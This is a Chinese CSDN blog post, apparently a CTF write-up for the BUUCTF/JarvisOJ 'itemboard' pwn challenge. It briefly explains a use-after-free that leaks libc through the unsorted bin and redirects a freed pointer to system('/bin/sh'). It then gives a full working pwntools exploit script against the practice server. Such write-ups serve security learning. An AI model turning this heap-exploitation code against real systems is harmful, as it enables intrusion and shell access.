jarvisoj_itemboard

于 2022-04-10 15:14:30 发布
阅读量181 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124078704
版权

jarvisoj_itemboard

查看保护
在这里插入图片描述
简单题目

在这里插入图片描述
uaf漏洞
攻击思路:利用unsortedbin直接泄露出libc。劫持堆里面的指针为system下一次delete的时候就可以sysem(“/bin/sh”);笔者就不多写了比较简单,uaf手法可以看z1r0 's blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27746)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add(name, length, desc):
    r.sendlineafter("choose:", "1")
    r.sendlineafter("Item name?\n", name)
    r.sendlineafter("Description's len?\n", str(length))
    r.sendlineafter("Description?\n", desc)


def show(idx):
    r.sendlineafter("choose:", "3")
    r.sendlineafter("Which item?\n", str(idx))

def delete(idx):
    r.sendlineafter("choose:", "4")
    r.sendlineafter("Which item?\n", str(idx))

add('aaaa', 0x80, 'bbbb')
add('dddd', 0x20, 'dddd')

delete(0)

show(0)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']

delete(1)

add('a' * 16, 24, b'/bin/sh;aaaaaaaa' + p64(system_addr))

delete(0)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 857
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvis itemboard
发蝴蝶和大脑斧的博客
03-18 460
栈溢出点在item->description,同时还有删除item时只free了块,没有处理item_array,导致存在野指针。参考wp 第一种,uaf方法,由于堆的先进后出,当删除一个item后再申请item,块的内存顺序会和原来相反,因此构造name,此时item_array中的指针指向name,free时会将name当作item。 payload如下: from pwn import...
buuoj Pwn writeup 176-180
yongbaoii的博客
06-09 297
176 jarvisoj_itemboard 177 asis2016_b00ks 178 actf_2019_onerepeater 179 ciscn_2019_s_8 180 starctf_2019_girlfriend
pwn jarvis itemboard writeup
charlie_heng的专栏
01-22 607
这题真心坑。。。本地做出来了,但是连上服务器就不行,目测是堆地址中有一个\x00。。。。 这题有几个漏洞 第一个是,没有对new item 的大小做判断,可以越界直接rop 第二个是,delete_note的操作其实并没有用,只free掉了,但是array那里还存着地址,所以就可以uaf 其实这题单纯uaf都可以做出来的,但是rop也可以用上 来说下思路 1. 获取libc地址
Jarvis OJ PWN题解 持续更新~
qq_41071646的博客
03-28 1102
最近沉(被)迷(迫)学pwn 看我们的志琦大佬 我就知道 pwn 玩玩就行 但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下 这里找到了Jarvis OJ 然后我 是看那个 做出来的人多 我就做那个·~~~~~~~ 不定期的更新 Tell Me Something 然后这个这道题 其实很简单 栈溢出 没有任何防护 就防护了 ...
writeup_itemboard
钞sir的博客
03-05 3678
看这个add功能的函数: void __cdecl new_item() { int cnt; // eax@1 char buf[1024]; // [sp+0h] [bp-410h]@1 int content_len; // [sp+404h] [bp-Ch]@1 Item *item; // [sp+408h] [bp-8h]@1 item = (Item *)mal...
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
matlab说话代码-jarvis_data_eng_akshay:jarvis_data_eng_akshay
05-22
Sapra-Jarvis Consulting 我最近从UBC毕业,并以优异的成绩获得了机械工程学位。 在过去的几年中,随着我的兴趣从机械工程转向计算机,我在整个大学里都自学了计算机科学的概念。 我已经完成了多个项目,这些项目使...
jarvis_data_eng_PayalGupta
03-20
【标题】"jarvis_data_eng_PayalGupta" 提供的是一个关于数据工程的培训项目,由 Payal Gupta 主讲。这个培训可能涵盖了数据处理、数据分析、数据存储以及数据流的构建等方面,旨在提升学员在数据工程领域的技能。 ...
VB+ACCESS宾馆客房管理系统(系统+论文+封面).zip
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
自密实混凝土的研究进展.doc
08-16
自密实混凝土的研究进展.doc
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
08-16
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
基于python的人脸控制俄罗斯方块小游戏
08-16
基于python的人脸控制俄罗斯方块小游戏
vb+access高校固定资产管理系统(论文+程序).zip
最新发布
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
redis,一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数
08-16
引言 在Web应用发展的初期,那时关系型数据库受到了较为广泛的关注和应用,原因是因为那时候Web站点基本上访问和并发不高、交互也较少。而在后来,随着访问量的提升,使用关系型数据库的Web站点多多少少都开始在性能上出现了一些瓶颈,而瓶颈的源头一般是在磁盘的I/O上。而随着互联网技术的进一步发展,各种类型的应用层出不穷,这导致在当今云计算、大数据盛行的时代,对性能有了更多的需求,主要体现在以下四个方面: 低延迟的读写速度:应用快速地反应能极大地提升用户的满意度 支撑海量的数据和流量:对于搜索这样大型应用而言,需要利用PB级别的数据和能应对百万级的流量 大规模集群的管理:系统管理员希望分布式应用能更简单的部署和管理 庞大运营成本的考量:IT部门希望在硬件成本、软件成本和人力成本能够有大幅度地降低 为了克服这一问题,NoSQL应运而生,它同时具备了高性能、可扩展性强、高可用等优点,受到广泛开发人员和仓库管理人员的青睐。 Redis是什么 Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数
51单片机(STC89C2)学习笔记2-4独立按键控制LED移位
08-16
51单片机(STC89C2)学习笔记2-4独立按键控制LED移位C语言代码
施耐德ATVA71变频器编程手册
08-16
施耐德ATVA71变频器编程手册
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值